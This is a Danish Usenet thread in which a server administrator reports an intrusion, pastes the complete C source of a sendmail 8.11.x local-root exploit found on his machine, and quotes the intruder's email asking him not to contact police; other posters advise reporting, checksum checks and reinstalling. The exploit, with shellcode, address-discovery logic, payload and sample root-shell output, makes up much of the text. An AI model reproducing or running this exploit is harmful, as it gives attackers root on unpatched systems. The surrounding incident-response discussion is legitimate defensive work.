---

Hej Alle.

Jeg er for et stykke tid siden blevet hacket, af en eller anden. Men er
lidt i syv sind om jeg skal anmelde det til nogen eller lade være, jeg fik
en mail fra vedkomne som har ført angrebet mod serveren, han bad mig om
ikke at anmelde ham.

Jeg fandt b.la dette på min server:

/*
   sendmail 8.11.x exploit (i386-Linux) by sd@sf.cz (sd@ircnet)
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   This code exploits well-known local-root bug in sendmail 8.11.x,
   8.12.x may be vulnerable too, but I didn't test it.

   It gives instant root shell with +s sendmail 8.11.x, x < 6

   We're using objdump, gdb & grep in order to obtain VECT, so make sure
   that they're on $PATH, works with 80% accuracy on stripped binaries
   on several distros without changing offsets (rh7.0, rh7.1, suse7.2,
   slackware 8.0...)

   Greetz:

   mlg & smoke : diz is mostly for .ro ppl ;) killall sl3
   sorcerer : stop da fuckin' asking me how to sploit sm, diz crap
    is for lamers like you ;))))
   devik : sm 0wns ;)
   to #linux.cz, #hack ....

   .... and to alot of other ppl, where i can't remeber theyr handles ;)

   args:
   -d specify depth of analysis (default=32) [bigger = more time]
   -o change offset (default = -32000) [between 1000..-64000]
   -v specify victim (default /usr/sbin/sendmail) [+s sm binary]
   -t specify temp directory (default /tmp/.sxp)
    [temporary files, should be mounted as nosuid]

   An example (redhat 7.0 CZ):
-------------------------------------------------------------------------------
[sd@pikatchu sxp]$ gcc sx.c -o sx
[sd@localhost sxp]$ ./sx

...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001
]=-...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[*] Victim = /usr/sbin/sendmail
[*] Depth = 32
[*] Offset = -16384
[*] Temp = /tmp/.sxp
[*] ESP = 0xbfffe708
[+] Created /tmp/.sxp
[+] Step 1. setuid() got = 0x080aa028
[*] Step 2. Copying /usr/sbin/sendmail to /tmp/.sxp/sm...OK
[*] Step 3. Disassembling /tmp/.sxp/sm...OK, found 3 targets
[*] Step 4. Exploiting 3 targets:
[1] (33% of targets) GOT=0x080aa028, VECT=0x00000064, offset=-16384
[2] (66% of targets) GOT=0x080aa028, VECT=0x080c6260, offset=-16384

Voila babe, entering rootshell!
Enjoy!
uid=0(root) gid=0(root) groups=0(root)
[root@pikatchu /]# whoami
root
[root@pikatchu /]# exit
exit
Thanx for choosing sd's products ;)
[sd@pikatchu sxp]$
--------------------------------------------------------------------------------

   Enjoy! And don't abuse it too much :)
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>
#include <string.h>

#define   SM   "/usr/sbin/sendmail"
#define   OBJDUMP   "objdump"
#define   GDB   "gdb"
#define GREP   "grep"

#define   OURDIR   "/tmp/.sxp"

/* an basic regexp to get interesting stuff from disassembled output
change it as you like if something doesn't work */

#define   DLINE   "%s -d %s 2> /dev/null | %s -B %d
\"mov.*%%.l,(%%e..,%%e..,1)\" | %s \".mov .*0x80.*,%%e..\""
#define DLINEA   OBJDUMP, vict, GREP, depth, GREP

#define   BRUTE_DLINE   "%s -d %s 2> /dev/null | %s \".mov .*0x80.*,%%e..\""
#define BRUTE_DLINEA   OBJDUMP, vict, GREP


#define NOPLEN   32768

#define uchar unsigned char
#define NOP 0x90

/* 19 bytes ;), shell must be appended */
char shellcode[] =
   "\xeb\x0c\x5b\x31\xc0\x50\x89\xe1"
"\x89\xe2\xb0\x0b\xcd\x80\xe8\xef"
"\xff\xff\xff";


char   scode[512];
char   dvict[] = SM;

struct   target {
   uint   off;
   uint   brk;
   uint   vect;
};

unsigned int get_esp()
{
   __asm__("movl %esp,%eax");
}

char   ourdir[256] = OURDIR;

/* cleanup */
void   giveup(int i)
{
   char buf[256];
   sprintf(buf, "/bin/rm -rf %s > /dev/null 2> /dev/null", ourdir);
   system(buf);
   if (i >= 0) exit(i);
}

/* main sploit, stolen mostly from alsou.c ;) */
void   sploit(char *victim, uint got, uint vect, uint ret)
{
   uchar   egg[sizeof(scode) + NOPLEN + 5];
   char   s[512] = "-d";
   char   *argv[3];
   char   *envp[2];
   uint   first, last, i;

   strcpy(egg, "EGG=");
   memset(egg + 4, NOP, NOPLEN);
   strcpy(egg + 4 + NOPLEN, scode);

   last = first = -vect - (0xffffffff - got + 1);
   while (ret) {
      char   tmp[256];
      i = ret & 0xff;
      sprintf(tmp, "%u-%u.%u-", first, last, i);
      strcat(s, tmp);
      last = ++first;
      ret = ret >> 8;
   }
   s[strlen(s) - 1] = 0;
   argv[0] = victim;
   argv[1] = s;
   argv[2] = NULL;
   envp[0] = egg;
   envp[1] = NULL;
   execve(victim, argv, envp);
}

int   use(char *s)
{
    printf("%s [command] [options]\n"
      "-h this help\n"
      "-d specify depth of analysis (default=32)\n"
      "-o change offset (default = -32000)\n"
      "-v specify victim (default /usr/sbin/sendmail)\n"
      "-t specify temp directory (default /tmp/.sxp)\n"
      "-b   enables bruteforce (WARNING: this may take about 20-30 minutes!)\n",
s);
   return 1;
}

/* exploited flag */
int   exploited = 0;

/* child root-shell will send us SIGUSR if everything is ok */
void   sigusr(int i)
{
   exploited++;
   giveup(-1);
}

int   main(int argc, char *argv[])
{
   char   victim[256] = SM;
   char   vict[256];
   char   gscr[256];
   char   path[256];
   
   char   d[256];
   struct   stat   st;
   FILE   *f;
   char   buf[256];
   int   got;

   struct   target t[1024];
   uint   off, ep, l;
   int   i,j;

   int   offset = -16384;
   int   esp;
   int   depth = 32;
   int   brute = 0;

   /* rootshell (if argv[0] == NULL) */
   if (!*argv) {
      /* open stdin and stdout */
      dup2(2, 0);
      dup2(2, 1);
      setuid(0);   /* regain root privs */
      setgid(0);
      /* send signal to parent that exploit is done */
      kill(getppid(), SIGUSR1);
      /* l-a-m-e ;) */
      printf("\nVoila babe, entering rootshell!\nEnjoy!\n"); fflush(stdout);
      chdir("/");
      system("/usr/bin/id");
      setenv("BASH_HISTORY", "/dev/null", 1);
      execl("/bin/bash", "-bash", NULL);
   }

   printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz
[sd@ircnet], 2001 ]=-...\n"
    "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");

   while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) {
      switch (i) {
         case 'd':
            if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1))
               return use(argv[0]);
            break;
         case 'o':
            if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1))
               return use(argv[0]);
            break;
         case 'v':
            if (!optarg) return use(argv[0]);
            strcpy(victim, optarg);
            break;
         case 't':
            if (!optarg) return use(argv[0]);
            strcpy(ourdir, optarg);
            break;
         case 'b':
            brute++;
            break;
         case 'h':
         default:
            return use(argv[0]);
      }
   }
   if (brute) printf("[*] Using brute force, this may take some time\n");
   /* create full path to rootshell, cause
sendmail will change it's cwd */
   path[0] = 0;
   if (argv[0][0] != '/') {
      getcwd(path, 256);
   }

   /* construct shellcode */
   sprintf(scode, "%s%s/%s", shellcode, path, argv[0]);

   /* get stack frame */
   esp = get_esp();
   close(0);
   signal(SIGUSR1, sigusr);

   /* remove old stuff */
   giveup(-1);

   printf( "[*] Victim = %s\n"
      "[*] Depth = %d\n"
      "[*] Offset = %d\n"
      "[*] Temp = %s\n"
      "[*] ESP = 0x%08x\n",
      victim,
      depth,
      offset,
      ourdir,
      esp);
   stat(victim, &st);
   if ((st.st_mode & S_ISUID) == 0) {
      printf("[-] Bad: %s isn't suid ;(\n", victim);
   }

   if (access(victim, R_OK + X_OK + F_OK) < 0) {
      printf("[-] Bad: We haven't access to %s !\n", victim);
   }

   if (mkdir(ourdir, 0777) < 0) {
      perror("[-] Can't create our tempdir!\n");
      giveup(1);
   }
   printf("[+] Created %s\n", ourdir);
   sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim);
   f = popen(buf, "r");
   if (fscanf(f, "%x", &got) != 1) {
      pclose(f);
      printf("[-] Cannot get setuid() GOT\n");
      giveup(1);
   }
   /* get GOT */
   pclose(f);
   printf("[+] Step 1. setuid() got = 0x%08x\n", got);
   sprintf(vict, "%s/sm", ourdir);
   printf("[*] Step 2. Copying %s to %s...", victim, vict); fflush(stdout);
   sprintf(buf, "/bin/cp -f %s %s", victim, vict);
   system(buf);
   if (access(vict, R_OK + X_OK + F_OK) < 0) {
      perror("Failed");
      giveup(1);
   }
   printf("OK\n");
   /* disassemble & find targets*/
   printf("[*] Step 3. Disassembling %s...", vict); fflush(stdout);
   if (!brute) {
      sprintf(buf, DLINE, DLINEA);
   } else {
      sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA);
   }
   f = popen(buf, "r");
   i = 0;
   while (fgets(buf, 256, f)) {
      int   k, dontadd = 0;
      if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n",
&ep, d, d, d, d, d, d, &off, d) == 9) {
         /* same value ? */
         for (k=0; k < i; k++) {
            if (t[k].off == off) dontadd++;
         }
         /* new value ? */
         if (!dontadd) {
            /* add it to table */
            t[i].off = off;
            t[i++].brk = ep;
         }
      }
   }
   pclose(f);
   printf("OK, found %d targets\n", i);

   /* gdb every target and look for theyr VECT */
   printf("[*] Step 4. Exploiting %d targets:\n", i); fflush(stdout);
   sprintf(gscr, "%s/gdb", ourdir);

   off = 0;
   for (j=0; j < i; j++) {
      /* create gdb script */
      f = fopen(gscr, "w+");
      if (!f) {
         printf("Cannot create gdb script\n");
         giveup(1);
      }
      fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off);
      fclose(f);
      sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict);
      f = popen(buf, "r");
      if (!f) {
         printf("Failed to spawn gdb!\n");
         giveup(1);
      }
      /* scan gdb's output */
      while (1) {
         char buf[256];
         char *p;
         t[j].vect = 0;
         p = fgets(buf, 256, f);
         if (!p) break;
         if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) {
            t[j].vect = l;
            off++;
            break;
         }
      }
      pclose(f);
      if (t[j].vect) {
         int   pid;
         printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n",
j, j*100/i , got, t[j].vect, offset);
         fflush(stdout);
         pid = fork();
         if (pid == 0) {
            close(1);
            sploit(victim, got, t[j].vect, esp + offset);
         }
         /* wait until sendmail finishes (expoit failed)
    or until SIGUSR arrives */
         wait(NULL);
         /* exploited ?? */
         if (exploited) {
            wait(NULL);   /* kill zombie */
            printf("Thanx for choosing sd's products ;)\n");
            exit(0);
         }
      }
   }
   printf("[-] All targets failed, probably not vulnerable ;(\n");
   giveup(1);
}

/* That's all. */

Hilsen Tommy

---

Tommy wrote:

>Jeg er for et stykke tid siden blevet hacket, af en eller anden. Men er
>lidt i syv sind om jeg skal anmelde det til nogen eller lade være, jeg fik
>en mail fra vedkomne som har ført angrebet mod serveren, han bad mig om
>ikke at anmelde ham.

Du er blevet angrebet af en lokal exploit, hvilket vil sige at
vedkommende havde en konto på din maskine. Han har altså misbrugt din
tillid på det groveste!

I say nuke the bastard!

Evt. FUT til dk.edb.sikkerhed eller dk.admin.netmisbrug.

--
"...in Spain!"

---

Christian Andersen <m4jni76ztglp001@sneakemail.com> wrote:

> Du er blevet angrebet af en lokal exploit, hvilket vil sige at
> vedkommende havde en konto på din maskine.

Eller at han har brugt en remote exploit til at komme ind.

--
Niels, The Offspring Mailinglist www.image.dk/~teglsbo

---

Niels Teglsbo wrote:

>> Du er blevet angrebet af en lokal exploit, hvilket vil sige at
>> vedkommende havde en konto på din maskine.

>Eller at han har brugt en remote exploit til at komme ind.

Også muligt. Dog virker det så usandsynligt at angriberen skulle sende
offeret en email.

--
"...in Spain!"

---

Tommy skrev:

> Jeg er for et stykke tid siden blevet hacket, af en eller anden.
> Men er lidt i syv sind om jeg skal anmelde det til nogen eller
> lade være,

Jeg ville uden tøven anmelde det.


// Klaus

--
><>    vandag, môre, altyd saam

---

Tommy wrote:

> Jeg er for et stykke tid siden blevet hacket, af en eller anden. Men er

Er der nogen let måde, hvorpå man (måske) kan se, om man er blevet hacket
på noget tidspunkt?

-> Michael Knudsen

---

In <a270e2$12qp$1@news.cybercity.dk> Michael Knudsen <knudsen@imf.au.dk> writes:

>Tommy wrote:

>> Jeg er for et stykke tid siden blevet hacket, af en eller anden. Men er

>Er der nogen let måde, hvorpå man (måske) kan se, om man er blevet hacket
>på noget tidspunkt?

Du har vel en md5sum paa alle filer i /etc/, /usr/bin, /bin, /sbin og /usr/sbin ?

/Martin

---

Vedkomne hacker har brugt en sikkerheds brist i software indstalleret på
en apache server, åbenbart en kendt sikkerhedshul, som gjorde det muligt
,at få koderne ind på serveren, han har ikke kunnet kompilerer koderne
da der ikke er indstalleret gcc på serveren,han har ihvertfald efterladt
sig så mange spor på serveren så det nærmest virker uproffesionelt.

Havde han haft root shell adgang vil jeg tro at han ville have slettet
alle spor efter sig.

Hvordan leder man efter $hide filer ?


Hilsen Tommy

Her er kopien af mailen.

hello,



I did a little surfing this weekend and noticed that your webserver is vulnerable to several web-based attacks, I advice you to install phpnuk and sendmail-patches (a lot of security-holes have been discovered lately on phpnuke). I succeeded in getting your passwd, hosts... files



I don't want to harm your system in any way, I just want to have some fun in weekend, you are root so I suppose you know what coding feels like.

Please don't go to cops...



(I am just trying to get rootshell and then I quit, if you don't want this, email me and I will stop immediately)



greets

dip@nirvanet.net <mailto:dip@nirvanet.net>



proof:



--do you know where this could come from?



drwxrwxrwt 12 root root 4096 Nov 25 16:52 .
drwxr-xr-x 19 root root 4096 Nov 15 14:49 ..
-rw-r--r-- 1 root root 0 Nov 15 14:27 Acrc2a8.tmp
-rw-r--r-- 1 root root 0 Nov 15 14:56 Acrc9a6.tmp
-rw-r--r-- 1 apache apache 0 Nov 17 06:17 aj
-rwxr-xr-x 1 apache apache 960024 Nov 17 05:40 bsh
-rw-r--r-- 1 apache apache 960024 Nov 17 05:40 bsh.1
-rw-r--r-- 1 apache apache 960024 Nov 17 05:40 bsh.2
-rw-r--r-- 1 apache apache 1441 Nov 17 04:54 bsh.c
-rw-r--r-- 1 apache apache 1441 Nov 17 04:54 bsh.c.1
-rw-r--r-- 1 apache apache 1441 Nov 17 04:54 bsh.c.2
drwxr-xr-x 2 root root 4096 Nov 15 14:49 cd
-rw------- 1 root root 229 Oct 28 23:57 dcop9dluQD
-rw------- 1 root root 229 Nov 16 22:46 dcopC9lPDr
-rw------- 1 root root 227 Nov 24 15:02 dcopr9yz5g
-rw------- 1 root root 229 Nov 7 12:41 dcopyMeIZ2
srw------- 1 root nobody 0 Nov 10 21:36 .fam4dIPp1
srw------- 1 root nobody 0 Oct 13 11:35 .fam4wMcIt
srw------- 1 root nobody 0 Nov 7 12:43 .fam778Tid
srw------- 1 root nobody 0 Oct 12 15:19 .fam7MlePz
srw------- 1 root nobody 0 Oct 13 14:34 .fam7nMop8
srw------- 1 root nobody 0 Nov 7 19:57 .fam8pSuvM
srw------- 1 root nobody 0 Oct 12 15:19 .fam99rNIs
srw------- 1 root nobody 0 Nov 16 22:46 .famaMGk88
srw------- 1 root nobody 0 Oct 12 15:18 .famArhxiI
srw------- 1 root nobody 0 Oct 12 15:18 .famAsQ7Jh
srw------- 1 root nobody 0 Nov 14 13:00 .fambPE8AG
srw------- 1 root nobody 0 Nov 7 19:57 .fambQF1cy
srw------- 1 root nobody 0 Nov 11 16:40 .fambs1jIr
srw------- 1 root nobody 0 Oct 14 00:02 .famc6I7di
srw------- 1 root nobody 0 Nov 11 16:44 .famcFLeXK
srw------- 1 root nobody 0 Nov 10 18:11 .famCntrFL
srw------- 1 root nobody 0 Oct 14 14:02 .famcRRbO0
srw------- 1 root nobody 0 Oct 13 14:34 .famdKv7EJ
srw------- 1 root nobody 0 Oct 13 13:23 .famEki3tK
srw------- 1 root nobody 0 Nov 7 19:58 .famFHGTIo
srw------- 1 root nobody 0 Nov 24 15:02 .famfrvYCq
srw------- 1 root nobody 0 Oct 13 13:17 .famFXXdEj
srw------- 1 root nobody 0 Nov 11 16:40 .famg1eJys
srw------- 1 root nobody 0 Nov 16 22:46 .famGeu7ra
srw------- 1 root nobody 0 Oct 12 15:19 .famGt0esp
srw------- 1 root nobody 0 Nov 11 16:41 .famGuWqnC
srw------- 1 root nobody 0 Nov 24 15:02 .famgvQsZh
srw------- 1 root nobody 0 Oct 28 23:57 .famHenNwH
srw------- 1 root nobody 0 Oct 13 13:21 .famhmLP6x
srw------- 1 root nobody 0 Oct 28 23:57 .famiFDuft
srw------- 1 root nobody 0 Nov 16 22:46 .famiFenWB
srw------- 1 root nobody 0 Oct 13 15:00 .famiHFzR2
srw------- 1 root nobody 0 Oct 13 15:00 .famINn1Lx
srw------- 1 root nobody 0 Oct 13 13:20 .famJ00X4o
srw------- 1 root nobody 0 Nov 24 15:02 .famJ1g8mP
srw------- 1 root nobody 0 Nov 7 12:41 .famjoHvsk
srw------- 1 root nobody 0 Oct 12 15:18 .famKJmqxa
srw------- 1 root nobody 0 Oct 12 15:18 .famm3YWSC
srw------- 1 root nobody 0 Nov 10 21:36 .famm7G6Ve
srw------- 1 root nobody 0 Oct 12 16:25 .famMs8XBC
srw------- 1 root nobody 0 Nov 24 16:46 .famN8AsQB
srw------- 1 root nobody 0 Nov 7 12:41 .famncjn3n
srw------- 1 root nobody 0 Oct 14 14:02 .famo9Gktu
srw------- 1 root nobody 0 Oct 13 15:00 .famOCJHM2
srw------- 1 root nobody 0 Oct 28 23:57 .famp9V0pD
srw------- 1 root nobody 0 Nov 16 22:46 .famPaySoG
srw------- 1 root nobody 0 Oct 12 15:19 .famPuFmcu
srw------- 1 root nobody 0 Oct 13 13:20 .famQ74TDD
srw------- 1 root nobody 0 Oct 13 14:49 .famqRXDYP
srw------- 1 root nobody 0 Oct 12 15:18 .famqWHPbR
srw------- 1 root nobody 0 Nov 7 19:58 .famQyUfqt
srw------- 1 root nobody 0 Oct 28 23:57 .famR1Wmjz
srw------- 1 root nobody 0 Nov 7 12:41 .famRnFQfr
srw------- 1 root nobody 0 Oct 28 23:57 .famRTxG8N
srw------- 1 root nobody 0 Oct 28 23:57 .famS8Fadw
srwx------ 1 root nobody 0 Nov 24 15:02 .fam_socket
srw------- 1 root nobody 0 Oct 12 16:25 .famt3s3RQ
srw------- 1 root nobody 0 Nov 7 12:41 .famTiuzLn
srw------- 1 root nobody 0 Nov 11 16:40 .famuBSdx8
srw------- 1 root nobody 0 Nov 24 16:46 .famuJKfXF
srw------- 1 root nobody 0 Nov 24 15:02 .famUw54qz
srw------- 1 root nobody 0 Nov 11 16:45 .famV6cd5p
srw------- 1 root nobody 0 Nov 16 22:46 .famVgGZXI
srw------- 1 root nobody 0 Nov 11 16:40 .famvqApYW
srw------- 1 root nobody 0 Oct 13 14:49 .famwASL5d
srw------- 1 root nobody 0 Nov 7 19:22 .famWgEDA4
srw------- 1 root nobody 0 Oct 12 15:18 .famXc8rut
srw------- 1 root nobody 0 Nov 11 16:44 .famxpGgxG
srw------- 1 root nobody 0 Nov 10 18:11 .famxxTubI
srw------- 1 root nobody 0 Nov 16 22:46 .famyiIMCj
srw------- 1 root nobody 0 Oct 12 15:19 .famYZGD7v
srw------- 1 root nobody 0 Oct 13 15:00 .famZ5yEyA
srw------- 1 root nobody 0 Nov 7 12:43 .famZbm6lZ



---------------------------Imagination is more important than knowledge-----------------

@.Einstein

---

tommy <tommy@coolscreen.dk> wrote in
news:3C471C58.7040303@coolscreen.dk:

> Vedkomne hacker har brugt en sikkerheds brist i software
> indstalleret på en apache server

hvor ser du noget med apache ?
- så vidt jeg kan se er det hele sendmail der "snydes"

--
|-|$235-|)k - Mickey - Eko sum lapis
http://susie.dk/apg - hvis du trænger til nyt password!

---

In <3C471C58.7040303@coolscreen.dk> tommy <tommy@coolscreen.dk> writes:



>Vedkomne hacker har brugt en sikkerheds brist i software indstalleret på
>en apache server, åbenbart en kendt sikkerhedshul, som gjorde det muligt
>,at få koderne ind på serveren, han har ikke kunnet kompilerer koderne
>da der ikke er indstalleret gcc på serveren,han har ihvertfald efterladt
>sig så mange spor på serveren så det nærmest virker uproffesionelt.

>Havde han haft root shell adgang vil jeg tro at han ville have slettet
>alle spor efter sig.

>Hvordan leder man efter $hide filer ?

Du boer re-installerer hele maskinen.

/Mvh
Martin

---

tommy wrote:

> Vedkomne hacker har brugt en sikkerheds brist i software indstalleret på
> en apache server, åbenbart en kendt sikkerhedshul, som gjorde det muligt
> ,at få koderne ind på serveren, han har ikke kunnet kompilerer koderne
> da der ikke er indstalleret gcc på serveren,han har ihvertfald efterladt
> sig så mange spor på serveren så det nærmest virker uproffesionelt.
>
> Havde han haft root shell adgang vil jeg tro at han ville have slettet
> alle spor efter sig.
>
> Hvordan leder man efter $hide filer ?
>
> Hilsen Tommy
>
> Her er kopien af mailen.
>
> hello,
>
> I did a little surfing this weekend and noticed that your webserver is vulnerable to several web-based attacks, I advice you to install phpnuk and sendmail-patches (a lot of security-holes have been discovered lately on phpnuke). I succeeded in getting your passwd, hosts... files
>
> I don't want to harm your system in any way, I just want to have some fun in weekend, you are root so I suppose you know what coding feels like.
>
> Please don't go to cops...
>
> (I am just trying to get rootshell and then I quit, if you don't want this, email me and I will stop immediately)
>
> greets
>
> dip@nirvanet.net <mailto:dip@nirvanet.net>
>
> proof:
>
> --do you know where this could come from?
>
> drwxrwxrwt 12 root root 4096 Nov 25 16:52 .
> drwxr-xr-x 19 root root 4096 Nov 15 14:49 ..
> -rw-r--r-- 1 root root 0 Nov 15 14:27 Acrc2a8.tmp
> -rw-r--r-- 1 root root 0 Nov 15 14:56 Acrc9a6.tmp
> -rw-r--r-- 1 apache apache 0 Nov 17 06:17 aj
> -rwxr-xr-x 1 apache apache 960024 Nov 17 05:40 bsh
> -rw-r--r-- 1 apache apache 960024 Nov 17 05:40 bsh.1
> -rw-r--r-- 1 apache apache 960024 Nov 17 05:40 bsh.2
> -rw-r--r-- 1 apache apache 1441 Nov 17 04:54 bsh.c
> -rw-r--r-- 1 apache apache 1441 Nov 17 04:54 bsh.c.1
> -rw-r--r-- 1 apache apache 1441 Nov 17 04:54 bsh.c.2
> drwxr-xr-x 2 root root 4096 Nov 15 14:49 cd
> -rw------- 1 root root 229 Oct 28 23:57 dcop9dluQD
> -rw------- 1 root root 229 Nov 16 22:46 dcopC9lPDr
> -rw------- 1 root root 227 Nov 24 15:02 dcopr9yz5g
> -rw------- 1 root root 229 Nov 7 12:41 dcopyMeIZ2
> srw------- 1 root nobody 0 Nov 10 21:36 .fam4dIPp1
> srw------- 1 root nobody 0 Oct 13 11:35 .fam4wMcIt
> srw------- 1 root nobody 0 Nov 7 12:43 .fam778Tid
> srw------- 1 root nobody 0 Oct 12 15:19 .fam7MlePz
> srw------- 1 root nobody 0 Oct 13 14:34 .fam7nMop8
> srw------- 1 root nobody 0 Nov 7 19:57 .fam8pSuvM
> srw------- 1 root nobody 0 Oct 12 15:19 .fam99rNIs
> srw------- 1 root nobody 0 Nov 16 22:46 .famaMGk88
> srw------- 1 root nobody 0 Oct 12 15:18 .famArhxiI
> srw------- 1 root nobody 0 Oct 12 15:18 .famAsQ7Jh
> srw------- 1 root nobody 0 Nov 14 13:00 .fambPE8AG
> srw------- 1 root nobody 0 Nov 7 19:57 .fambQF1cy
> srw------- 1 root nobody 0 Nov 11 16:40 .fambs1jIr
> srw------- 1 root nobody 0 Oct 14 00:02 .famc6I7di
> srw------- 1 root nobody 0 Nov 11 16:44 .famcFLeXK
> srw------- 1 root nobody 0 Nov 10 18:11 .famCntrFL
> srw------- 1 root nobody 0 Oct 14 14:02 .famcRRbO0
> srw------- 1 root nobody 0 Oct 13 14:34 .famdKv7EJ
> srw------- 1 root nobody 0 Oct 13 13:23 .famEki3tK
> srw------- 1 root nobody 0 Nov 7 19:58 .famFHGTIo
> srw------- 1 root nobody 0 Nov 24 15:02 .famfrvYCq
> srw------- 1 root nobody 0 Oct 13 13:17 .famFXXdEj
> srw------- 1 root nobody 0 Nov 11 16:40 .famg1eJys
> srw------- 1 root nobody 0 Nov 16 22:46 .famGeu7ra
> srw------- 1 root nobody 0 Oct 12 15:19 .famGt0esp
> srw------- 1 root nobody 0 Nov 11 16:41 .famGuWqnC
> srw------- 1 root nobody 0 Nov 24 15:02 .famgvQsZh
> srw------- 1 root nobody 0 Oct 28 23:57 .famHenNwH
> srw------- 1 root nobody 0 Oct 13 13:21 .famhmLP6x
> srw------- 1 root nobody 0 Oct 28 23:57 .famiFDuft
> srw------- 1 root nobody 0 Nov 16 22:46 .famiFenWB
> srw------- 1 root nobody 0 Oct 13 15:00 .famiHFzR2
> srw------- 1 root nobody 0 Oct 13 15:00 .famINn1Lx
> srw------- 1 root nobody 0 Oct 13 13:20 .famJ00X4o
> srw------- 1 root nobody 0 Nov 24 15:02 .famJ1g8mP
> srw------- 1 root nobody 0 Nov 7 12:41 .famjoHvsk
> srw------- 1 root nobody 0 Oct 12 15:18 .famKJmqxa
> srw------- 1 root nobody 0 Oct 12 15:18 .famm3YWSC
> srw------- 1 root nobody 0 Nov 10 21:36 .famm7G6Ve
> srw------- 1 root nobody 0 Oct 12 16:25 .famMs8XBC
> srw------- 1 root nobody 0 Nov 24 16:46 .famN8AsQB
> srw------- 1 root nobody 0 Nov 7 12:41 .famncjn3n
> srw------- 1 root nobody 0 Oct 14 14:02 .famo9Gktu
> srw------- 1 root nobody 0 Oct 13 15:00 .famOCJHM2
> srw------- 1 root nobody 0 Oct 28 23:57 .famp9V0pD
> srw------- 1 root nobody 0 Nov 16 22:46 .famPaySoG
> srw------- 1 root nobody 0 Oct 12 15:19 .famPuFmcu
> srw------- 1 root nobody 0 Oct 13 13:20 .famQ74TDD
> srw------- 1 root nobody 0 Oct 13 14:49 .famqRXDYP
> srw------- 1 root nobody 0 Oct 12 15:18 .famqWHPbR
> srw------- 1 root nobody 0 Nov 7 19:58 .famQyUfqt
> srw------- 1 root nobody 0 Oct 28 23:57 .famR1Wmjz
> srw------- 1 root nobody 0 Nov 7 12:41 .famRnFQfr
> srw------- 1 root nobody 0 Oct 28 23:57 .famRTxG8N
> srw------- 1 root nobody 0 Oct 28 23:57 .famS8Fadw
> srwx------ 1 root nobody 0 Nov 24 15:02 .fam_socket
> srw------- 1 root nobody 0 Oct 12 16:25 .famt3s3RQ
> srw------- 1 root nobody 0 Nov 7 12:41 .famTiuzLn
> srw------- 1 root nobody 0 Nov 11 16:40 .famuBSdx8
> srw------- 1 root nobody 0 Nov 24 16:46 .famuJKfXF
> srw------- 1 root nobody 0 Nov 24 15:02 .famUw54qz
> srw------- 1 root nobody 0 Nov 11 16:45 .famV6cd5p
> srw------- 1 root nobody 0 Nov 16 22:46 .famVgGZXI
> srw------- 1 root nobody 0 Nov 11 16:40 .famvqApYW
> srw------- 1 root nobody 0 Oct 13 14:49 .famwASL5d
> srw------- 1 root nobody 0 Nov 7 19:22 .famWgEDA4
> srw------- 1 root nobody 0 Oct 12 15:18 .famXc8rut
> srw------- 1 root nobody 0 Nov 11 16:44 .famxpGgxG
> srw------- 1 root nobody 0 Nov 10 18:11 .famxxTubI
> srw------- 1 root nobody 0 Nov 16 22:46 .famyiIMCj
> srw------- 1 root nobody 0 Oct 12 15:19 .famYZGD7v
> srw------- 1 root nobody 0 Oct 13 15:00 .famZ5yEyA
> srw------- 1 root nobody 0 Nov 7 12:43 .famZbm6lZ
>
> ---------------------------Imagination is more important than knowledge-----------------
>
> @.Einstein

Svar ham tilbage og sig hvis han en eneste gang igen forsøger at komme i kontakt med din maskine så melder du ham øjeblikkeligt.
Hvis han ikke havde kontaktet dig eller på anden måde lagt enbesked(så venligt som han gjorde det der) så meld ham til cert øje
blikkeligt.

Mike